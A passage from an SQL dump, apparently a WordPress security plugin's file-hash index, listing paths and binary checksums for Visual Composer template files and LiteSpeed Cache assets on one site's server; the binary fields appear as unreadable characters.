e>G\Zyq9\";','',0,'?'),('[Yˋ%','wp-content/plugins/js_composer/include/templates/pages/vc-welcome/index.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/pages/vc-welcome/index.php',0,' 9+',' 9+','~s1d:p$%_+_:E','',0,'?'),(':7FVB\nbFJri)','wp-content/plugins/js_composer/include/templates/pages/vc-welcome/vc-faq.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/pages/vc-welcome/vc-faq.php',0,'rvI&6dH','rvI&6dH','c==-750^ ĵ׀b ','',0,'?'),('yǬ}*K*','wp-content/plugins/js_composer/include/templates/pages/vc-welcome/vc-resources.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/pages/vc-welcome/vc-resources.php',0,'mFpdHi','mFpdHi','F#Ɨ!Ȟ׏Zg@xP$\'\Z7','',0,'?'),('ОպP?s䏪','wp-content/plugins/js_composer/include/templates/pages/vc-welcome/vc-welcome.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/pages/vc-welcome/vc-welcome.php',0,'v,4Co','v,4Co','j\'wJ$#\rL\'VY\Zr\\\nY','',0,'?'),('6>!^`1b','wp-content/plugins/js_composer/include/templates/params/column_offset/template.tpl.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/params/column_offset/template.tpl.php',0,'#\"^bW','#\"^bW','x㐵џݞ8 7T\Z>[','',0,'?'),('C\rX','wp-content/plugins/js_composer/include/templates/params/google_fonts/template.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/params/google_fonts/template.php',0,'i F5ғ_','i F5ғ_','gklc+ۘ+7r-QV% p','',0,'?'),(';$-)B;bK;','wp-content/plugins/js_composer/include/templates/params/loop/templates.html','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/params/loop/templates.html',0,'}etp/G','}etp/G','Āwڱ B4hZZ܋x&oԀ','',0,'?'),('\rUzJӢBE','wp-content/plugins/js_composer/include/templates/params/options/templates.html','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/params/options/templates.html',0,'zOw뤾Ft.','zOw뤾Ft.','[o@wQE\n+OQx6_','',0,'?'),(' kBO% cS','wp-content/plugins/js_composer/include/templates/params/param_group/add.tpl.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/params/param_group/add.tpl.php',0,'wj\0S@c','wj\0S@c','\rTybIBx<gUV\0<\'J','',0,'?'),('3~fߧ藃 c','wp-content/plugins/js_composer/include/templates/params/param_group/content.tpl.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/params/param_group/content.tpl.php',0,'\\0T|S','\\0T|S','?@zIM=wQHri','',0,'?'),('X,IϏ­d','wp-content/plugins/js_composer/include/templates/params/param_group/inner_content.tpl.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/params/param_group/inner_content.tpl.php',0,'PG-O~4 ¤A#y','PG-O~4 ¤A#y','5싌QKZ\nI}7','',0,'?'),('?Ԃ?o}','wp-content/plugins/js_composer/include/templates/params/vc_grid_item/attributes/featured_image.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/params/vc_grid_item/attributes/featured_image.php',0,'Yx~80\0Wh','Yx~80\0Wh','k2`nr--3L=Er','',0,'?'),('О] wjdzKj','wp-content/plugins/js_composer/include/templates/params/vc_grid_item/attributes/post_categories.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/params/vc_grid_item/attributes/post_categories.php',0,'ujjap','ujjap','M[ϕ/֕O/Q:g\Z< `MM(','',0,'?'),('^\0O)W','wp-content/plugins/js_composer/include/templates/params/vc_grid_item/attributes/vc_btn.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/params/vc_grid_item/attributes/vc_btn.php',0,'R!:.R<_4','R!:.R<_4','ؖGoiExj0G9BY','',0,'?'),('_|\'쟹-\\K0','wp-content/plugins/js_composer/include/templates/params/vc_grid_item/editor/partials/vc_grid_item_editor_footer.tpl.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/params/vc_grid_item/editor/partials/vc_grid_item_editor_footer.tpl.php',0,'Ԣ7 ͅ*_ m','Ԣ7 ͅ*_ m','k6llqvVC$5EE3\0X@Z','',0,'?'),('w 6dºbLO','wp-content/plugins/js_composer/include/templates/params/vc_grid_item/editor/vc_grid_item_editor.tpl.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/params/vc_grid_item/editor/vc_grid_item_editor.tpl.php',0,'W88$^03','W88$^03','|E1cf _4rn8=B','',0,'?'),('堯X_wĮ','wp-content/plugins/js_composer/include/templates/params/vc_grid_item/editor/vc_ui-template-preview.tpl.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/params/vc_grid_item/editor/vc_ui-template-preview.tpl.php',0,'_%M\\0艗6S','_%M\\0艗6S',')`z#E\\qYDi|','',0,'?'),('r[ (0,8-','wp-content/plugins/js_composer/include/templates/params/vc_grid_item/preview.tpl.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/params/vc_grid_item/preview.tpl.php',0,'.i 3CC','.i 3CC','\0{set_sYOoTi}; ','',0,'?'),('#pGAS;;?','wp-content/plugins/js_composer/include/templates/params/vc_grid_item/shortcodes/vc_btn.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/params/vc_grid_item/shortcodes/vc_btn.php',0,'qG ɘK*.','qG ɘK*.','#QXRJ9%R/n?W&~ѩɻ','',0,'?'),(' EdP`T=|','wp-content/plugins/js_composer/include/templates/params/vc_grid_item/shortcodes/vc_button2.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/params/vc_grid_item/shortcodes/vc_button2.php',0,';y_v ',';y_v ',' pnj2,LqEvĚu6Jpx','',0,'?'),('5T?vƒRK+','wp-content/plugins/js_composer/include/templates/params/vc_grid_item/shortcodes/vc_custom_heading.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/params/vc_grid_item/shortcodes/vc_custom_heading.php',0,'>%6V)\0','>%6V)\0','OJln:fr\Z\"','',0,'?'),('F06<,A-K^','wp-content/plugins/js_composer/include/templates/params/vc_grid_item/shortcodes/vc_icon.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/params/vc_grid_item/shortcodes/vc_icon.php',0,'@?#8^T0]','@?#8^T0]','zHtwJt{9viòW\\','',0,'?'),('y W=Dq}','wp-content/plugins/js_composer/include/templates/params/vc_grid_item/shortcodes/vc_single_image.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/params/vc_grid_item/shortcodes/vc_single_image.php',0,'$q:,\rK$LD','$q:,\rK$LD','o/^e\Z\'Ƿe_-0@@\'X{','',0,'?'),('H0!!~','wp-content/plugins/js_composer/include/templates/shortcodes/layerslider_vc.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/shortcodes/layerslider_vc.php',0,'9Sޯ-|R\Z','9Sޯ-|R\Z','GE s!\'w\0rtF3ls','',0,'?'),('z:2mMvKۙ u','wp-content/plugins/js_composer/include/templates/shortcodes/post_block/_item.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/shortcodes/post_block/_item.php',0,'>=L&k =','>=L&k =','l\"W3{Toڱ)b/:βiFu\"','',0,'?'),('*ge ','wp-content/plugins/js_composer/include/templates/shortcodes/rev_slider_vc.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/shortcodes/rev_slider_vc.php',0,'䱿a((\n)','䱿a((\n)','֬8Jd4RCy$H=Q','',0,'?'),(',Lqm\\jX#.s','wp-content/plugins/js_composer/include/templates/shortcodes/vc_accordion.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/shortcodes/vc_accordion.php',0,'qKcx:`1','qKcx:`1','9\0`/6.X~/t×\'3G','',0,'?'),('X}\Z =;!G-','wp-content/plugins/js_composer/include/templates/shortcodes/vc_accordion_tab.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/shortcodes/vc_accordion_tab.php',0,'\'(>\\9޼','\'(>\\9޼','%(Y[G uPUaXl|K','',0,'?'),('VtQbШ8-','wp-content/plugins/js_composer/include/templates/shortcodes/vc_basic_grid.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/shortcodes/vc_basic_grid.php',0,'ؓa)rsN','ؓa)rsN','J\0n\'3|x]D2\Z5','',0,'?'),('F~D;B,','wp-content/plugins/js_composer/include/templates/shortcodes/vc_basic_grid_filter.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/shortcodes/vc_basic_grid_filter.php',0,')o0piH&7',')o0piH&7','AG:Vs5m >RZ{<','',0,'?'),('4USi)wc','wp-content/plugins/js_composer/include/templates/shortcodes/vc_btn.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/shortcodes/vc_btn.php',0,'prJ\0㫽W1[','prJ\0㫽W1[','V*|#eGlJ\Zyiƙ}N','',0,'?'),('I\'jg[Dm2','wp-content/plugins/js_composer/include/templates/shortcodes/vc_button.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/shortcodes/vc_button.php',0,'=:ؾew$','=:ؾew$','mE5*QY@ sH','',0,'?'),('ҹ)EGTh>','wp-content/plugins/js_composer/include/templates/shortcodes/vc_button2.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/shortcodes/vc_button2.php',0,'CX6i%Ն - P','CX6i%Ն - P','SʋPK]N Uf^ò?yD0y','',0,'?'),('W(8w','wp-content/plugins/js_composer/include/templates/shortcodes/vc_column.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/shortcodes/vc_column.php',0,'LL/u`\n\Z','LL/u`\n\Z',') E#e`a^gKZ','',0,'?'),(' }{?d9\\1','wp-content/plugins/js_composer/include/templates/shortcodes/vc_cta_button2.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/shortcodes/vc_cta_button2.php',0,'Mn\nxb','Mn\nxb','(GKsJ{:s> m[7)Dr','',0,'?'),('_{xX1ELޤs','wp-content/plugins/js_composer/include/templates/shortcodes/vc_custom_field.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/shortcodes/vc_custom_field.php',0,'\Z\ro\0 r=Ay]M','\Z\ro\0 r=Ay]M','RJ!!ЫIX~ibr {Y`','',0,'?'),('׫Wu6Eb','wp-content/plugins/js_composer/include/templates/shortcodes/vc_custom_heading.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/shortcodes/vc_custom_heading.php',0,'nOvonU\'','nOvonU\'','Ux3~%Ч \0Rx\rڑ4','',0,'?'),('M?L#3B(aMg','wp-content/plugins/js_composer/include/templates/shortcodes/vc_empty_space.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/shortcodes/vc_empty_space.php',0,'PNߥxaz','PNߥxaz','>mfA/ґAxQHDTӀl9','',0,'?'),('庖8VyK5Av','wp-content/plugins/js_composer/include/templates/shortcodes/vc_facebook.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/shortcodes/vc_facebook.php',0,'iy]ⷘܷS VD','iy]ⷘܷS VD','WNɧKZN-^GZ̮\rփ','',0,'?'),('%⢕ ;W','wp-content/plugins/js_composer/include/templates/shortcodes/vc_flickr.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/shortcodes/vc_flickr.php',0,'SV ?po]A^','SV ?po]A^','Gv&ҊhQPh\0 \nIEZ$SDD\\B','',0,'?'),('l\n.b','wp-content/plugins/js_composer/include/templates/shortcodes/vc_gallery.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/shortcodes/vc_gallery.php',0,'BÜf{u','BÜf{u','CFA=DRcc_PJ 5i4}ӠW,','',0,'?'),('ɒL$/lak|','wp-content/plugins/js_composer/include/templates/shortcodes/vc_gitem.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/shortcodes/vc_gitem.php',0,'pE5Q\'Mg(FE','pE5Q\'Mg(FE','\r! 0Û\0ۍ18۵l','',0,'?'),('-W-F8','wp-content/plugins/js_composer/include/templates/shortcodes/vc_gitem_animated_block.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/shortcodes/vc_gitem_animated_block.php',0,'Iv_\"C\ZuD34\\','Iv_\"C\ZuD34\\','4G>??\'&aƢA-xw','',0,'?'),('erf#IW','wp-content/plugins/js_composer/include/templates/shortcodes/vc_gitem_block.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/shortcodes/vc_gitem_block.php',0,'#}','wp-content/plugins/js_composer/include/templates/shortcodes/vc_gitem_post_author.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/shortcodes/vc_gitem_post_author.php',0,'rdC Li?3l','wp-content/plugins/js_composer/include/templates/shortcodes/vc_gitem_post_categories.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/shortcodes/vc_gitem_post_categories.php',0,'kKӼ2.B','kKӼ2.B',';\\ >=+\\rBR\nN+S99b','',0,'?'),('8Agxa','wp-content/plugins/js_composer/include/templates/shortcodes/vc_gitem_post_data.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/shortcodes/vc_gitem_post_data.php',0,'#-eczڈCU;','#-eczڈCU;','s%: `I-N;;հ:h\Z','',0,'?'),('ßAo&NŴ','wp-content/plugins/js_composer/include/templates/shortcodes/vc_gitem_post_meta.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/shortcodes/vc_gitem_post_meta.php',0,'Lb^\rI\"Ɉ','Lb^\rI\"Ɉ','5,{\'3ġR~nun4>q\\','',0,'?'),('Vss:値7','wp-content/plugins/js_composer/include/templates/shortcodes/vc_gitem_row.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/shortcodes/vc_gitem_row.php',0,'(9}`FHاV','(9}`FHاV','wȋu0ӆYL-Ebv','',0,'?'),('G\r6fLv-','wp-content/plugins/js_composer/include/templates/shortcodes/vc_gitem_zone.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/shortcodes/vc_gitem_zone.php',0,'Й_0x','Й_0x',')C 㡔=\0p,QzT!j','',0,'?'),('.oÞ[oD','wp-content/plugins/js_composer/include/templates/shortcodes/vc_gitem_zone_c.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/shortcodes/vc_gitem_zone_c.php',0,'1 35A:9@','1 35A:9@','õn[GebA=dz p=','',0,'?'),('bHAZχe2ϝ','wp-content/plugins/js_composer/include/templates/shortcodes/vc_gmaps.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/shortcodes/vc_gmaps.php',0,'&$v K \'','&$v K \'','n>Zw;i}BH,*f\"Sd|y','',0,'?'),('.QJ\n)ޛ','wp-content/plugins/js_composer/include/templates/shortcodes/vc_googleplus.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/shortcodes/vc_googleplus.php',0,'p\Z*PAl-?<','p\Z*PAl-?<','2g:NB=e|`YxOO4','',0,'?'),('c3[VA)','wp-content/plugins/js_composer/include/templates/shortcodes/vc_gutenberg.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/shortcodes/vc_gutenberg.php',0,'FLT!꡴H','FLT!꡴H','C  i_$;*KN9Cu','',0,'?'),('\"bSmdL9uH%!͕','wp-content/plugins/js_composer/include/templates/shortcodes/vc_hoverbox.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/shortcodes/vc_hoverbox.php',0,'V>q2(Aor)3E','V>q2(Aor)3E','\n*?\"RӵoUK>Nzt_G','',0,'?'),('W)DR x','wp-content/plugins/js_composer/include/templates/shortcodes/vc_icon.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/shortcodes/vc_icon.php',0,'-]k)2','-]k)2','-Mwb?TK育>̈́fӓ)܃','',0,'?'),('\r\n2THTU','wp-content/plugins/js_composer/include/templates/shortcodes/vc_images_carousel.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/shortcodes/vc_images_carousel.php',0,'դyo\r4\r','դyo\r4\r','j0;tp!ƞQ\nIG','',0,'?'),('{\'f>T\'\0SJ','wp-content/plugins/js_composer/include/templates/shortcodes/vc_item.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/shortcodes/vc_item.php',0,'њ4jA\ZY','њ4jA\ZY','6P~{\rp^Z/ao{L:x','',0,'?'),('s@2ʔeO','wp-content/plugins/js_composer/include/templates/shortcodes/vc_items.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/shortcodes/vc_items.php',0,'UfuQQӻ/$\r','UfuQQӻ/$\r','[\'E-0}k Tg\nd)','',0,'?'),('k%SٹzfKEc','wp-content/plugins/js_composer/include/templates/shortcodes/vc_line_chart.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/shortcodes/vc_line_chart.php',0,'?0&Vۜݓ','?0&Vۜݓ','p\ZRpmޑӻ\\ЎgK)n[Y2J','',0,'?'),(' #*¸3','wp-content/plugins/js_composer/include/templates/shortcodes/vc_message.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/shortcodes/vc_message.php',0,'Zʂ, ;','Zʂ, ;','h޽t9ǒwQD','',0,'?'),(':{_<dF8','wp-content/plugins/js_composer/include/templates/shortcodes/vc_pinterest.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/shortcodes/vc_pinterest.php',0,'0Mrc. ٢','0Mrc. ٢','l5\Z+v`80([(nJ0[','',0,'?'),('NY>/q!ws','wp-content/plugins/js_composer/include/templates/shortcodes/vc_posts_slider.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/shortcodes/vc_posts_slider.php',0,'oJrD\ZІ?0','oJrD\ZІ?0','+\"LqEx➓\n,=SC','wp-content/plugins/js_composer/include/templates/shortcodes/vc_toggle.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/shortcodes/vc_toggle.php',0,'\Zt4fE4','\Zt4fE4','~g z|6\Z@І(!fJ?\\le+~','',0,'?'),('j|3L\0\"^|秣[','wp-content/plugins/js_composer/include/templates/shortcodes/vc_tta_global.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/shortcodes/vc_tta_global.php',0,'^Ru>d\n','^Ru>d\n','h`1]N͝!YKFb ','',0,'?'),('(+LW~\0ǣ','wp-content/plugins/js_composer/include/templates/shortcodes/vc_tta_pageable_section.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/shortcodes/vc_tta_pageable_section.php',0,'Jݠ֌\"d','Jݠ֌\"d','IzWsU\Z@?zG i\0YLōZ','',0,'?'),('D2d4dy','wp-content/plugins/js_composer/include/templates/shortcodes/vc_tta_section.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/shortcodes/vc_tta_section.php',0,'>rTѠZ[A葌r','>rTѠZ[A葌r','l\0;D=ý.ZcH','',0,'?'),('Uj\rqۛK ','wp-content/plugins/js_composer/include/templates/shortcodes/vc_tweetmeme.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/shortcodes/vc_tweetmeme.php',0,')oۜYqUi',')oۜYqUi','Q>#}NERa)28ͮkb','',0,'?'),('Q6B5r?\"9','wp-content/plugins/js_composer/include/templates/shortcodes/vc_video.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/shortcodes/vc_video.php',0,'I@WY','I@WY','PCOQ+˱a1{>j-','',0,'?'),(' ؼ҇rg3$*%','wp-content/plugins/js_composer/include/templates/shortcodes/vc_widget_sidebar.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/shortcodes/vc_widget_sidebar.php',0,'\Zfoxi.y|~','\Zfoxi.y|~','~\n\rNNsE@lq x#Sz0','',0,'?'),('.y}','wp-content/plugins/js_composer/include/templates/shortcodes/vc_wp_archives.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/shortcodes/vc_wp_archives.php',0,'hbcr925zD3E','hbcr925zD3E','I\n yt|i8߳qy IG','',0,'?'),('6ׂ\Zo$T|','wp-content/plugins/js_composer/include/templates/shortcodes/vc_wp_calendar.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/shortcodes/vc_wp_calendar.php',0,'DNNsBIsnuUȆ','DNNsBIsnuUȆ','~{;bJ/ԉͶ/P-u粠','',0,'?'),('5hc]_?FRBX','wp-content/plugins/js_composer/include/templates/shortcodes/vc_wp_categories.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/shortcodes/vc_wp_categories.php',0,'5M\'ȷo\0ri','5M\'ȷo\0ri',' i wPH2\Z\\(l(euqh','',0,'?'),('gX8ϊ-A.','wp-content/plugins/js_composer/include/templates/shortcodes/vc_wp_custommenu.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/shortcodes/vc_wp_custommenu.php',0,'s?k\ZK','s?k\ZK','=^+nZ|@N=ZK$S!Rx\'','',0,'?'),(',Q\"t7n','wp-content/plugins/js_composer/include/templates/shortcodes/vc_wp_links.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/shortcodes/vc_wp_links.php',0,'BDԝ \\Y','BDԝ \\Y','l00r:OV8j l(宥h','',0,'?'),('^Е뉳mx','wp-content/plugins/js_composer/include/templates/shortcodes/vc_wp_meta.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/shortcodes/vc_wp_meta.php',0,'CNw ','CNw ','1I\' - PPK\\',' F)B>\\','XczBhk[bNupђa','',0,'?'),('Al oF<','wp-content/plugins/js_composer/index.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/index.php',0,'?l08K ','?l08K ','I1Il\0ڑG럡$js@UDŽ$@w','',0,'?'),('I\Z%xK%{k1','wp-content/plugins/js_composer/js_composer.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/js_composer.php',0,'Ѣ)~8I/','Ѣ)~8I/','(+v\nJpn\ZF7>В{\0*b','',0,'?'),('S.\\2D K~aFEz','wp-content/plugins/js_composer/vc_classmap.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/vc_classmap.json.php',0,'A AcA\02j','A AcA\02j','G]9a(Q\"5\"j^b%>bbo','',0,'?'),('m$6WҜgB$\04','wp-content/plugins/litespeed-cache/LICENSE','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/LICENSE',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','B7&]NDd','@H M;ﺾ5 i\'o5V','',0,'?'),('z@hx}ʯ','wp-content/plugins/litespeed-cache/assets/css/fonts/litespeedfont.eot','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/assets/css/fonts/litespeedfont.eot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','hSFsre','\'ꖸFDqXkTi+?V','',0,'?'),('_[Ğx','wp-content/plugins/litespeed-cache/assets/css/fonts/litespeedfont.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/assets/css/fonts/litespeedfont.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','҉Xl 4','`t$@w%^$>ay]3','',0,'?'),('o3Ww-L0B/','wp-content/plugins/litespeed-cache/assets/css/fonts/litespeedfont.ttf','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/assets/css/fonts/litespeedfont.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','xs{Ixp\"','8̤%_٪)%q\0LK#@]','',0,'?'),('C-ڪnߤpmT','wp-content/plugins/litespeed-cache/assets/css/fonts/litespeedfont.woff','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/assets/css/fonts/litespeedfont.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X}N6mŦb',']FYn8~d}+!#4J\0@)','',0,'?'),('K?\0bHjx6','wp-content/plugins/litespeed-cache/assets/css/iziModal.min.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/assets/css/iziModal.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%iAF8M','JofJ9TWm\'4-SCd','',0,'?'),('䷟E9=С','wp-content/plugins/litespeed-cache/assets/css/litespeed-legacy.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/assets/css/litespeed-legacy.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R=%1 ','%)G7,xm?pF\0~Vk .o','',0,'?'),('5LPi w=Z{:','wp-content/plugins/litespeed-cache/assets/img/icons/auto_draft.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/assets/img/icons/auto_draft.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ǚ.¹(V','ꁪ3\0Qwܙ2}/o3','',0,'?'),('   x@','wp-content/plugins/litespeed-cache/assets/img/icons/cross_icon.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/assets/img/icons/cross_icon.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' *','mNǘw h!l\\A8X3T','',0,'?'),('ow L-','wp-content/plugins/litespeed-cache/assets/img/icons/db.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/assets/img/icons/db.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','NY(y$5׳ ','Ŷ=:^\nY7ϑ','',0,'?'),('?^I)h','wp-content/plugins/litespeed-cache/assets/img/icons/spam_comment.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/assets/img/icons/spam_comment.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!r2EY7Z','B6K$O\0U\09_','',0,'?'),('\\%?SZy%A0;c','wp-content/plugins/litespeed-cache/assets/img/icons/success_icon.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/assets/img/icons/success_icon.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','녧[(u&yô','Wwfr<v\nEnq/t)','',0,'?'),('@_[u ','wp-content/plugins/litespeed-cache/assets/img/icons/trackback-pingback.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/assets/img/icons/trackback-pingback.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','vFHgx)','2sY@S8F/61Rt1G4$Er-','',0,'?'),('oYe̛mQ3','wp-content/plugins/litespeed-cache/assets/img/icons/trash_comment.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/assets/img/icons/trash_comment.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V0Q6.Cf_','5aG8-A^S-7b5;O6','',0,'?'),('𖀃fY*:','wp-content/plugins/litespeed-cache/assets/img/icons/trash_post.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/assets/img/icons/trash_post.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\nw8mR-o','\0>k|壂z暲$<|J }','',0,'?'),('D]jnYE-cJ','wp-content/plugins/litespeed-cache/assets/img/lscwp-logo_90x90.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/assets/img/lscwp-logo_90x90.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ҷ,~V~','eG[&`5Y[5vF>Xj[Z\0','',0,'?'),('so;Ԣ','wp-content/plugins/litespeed-cache/assets/img/lscwp_blue_font-icon_22px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/assets/img/lscwp_blue_font-icon_22px.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','͉Fy?\nI','V6L_mSe2%wk9`','',0,'?'),('[߷k^O$(\ng','wp-content/plugins/litespeed-cache/assets/img/lscwp_font-icon_32px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/assets/img/lscwp_font-icon_32px.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','NRPѝAKmH','8l_eqgΪR@xR`/2w ','',0,'?'),('SMJcPm','wp-content/plugins/litespeed-cache/assets/img/lscwp_gray-yellow_font-icon_22px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/assets/img/lscwp_gray-yellow_font-icon_22px.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M5f','<\'C2I%TnD\r\\C݁9[ή','',0,'?'),('*e>\\`-y^\'','wp-content/plugins/litespeed-cache/assets/img/lscwp_gray_font-icon_22px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/assets/img/lscwp_gray_font-icon_22px.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','c<&Bdz','݋;{?yfrH\"i*xI#','',0,'?'),('~  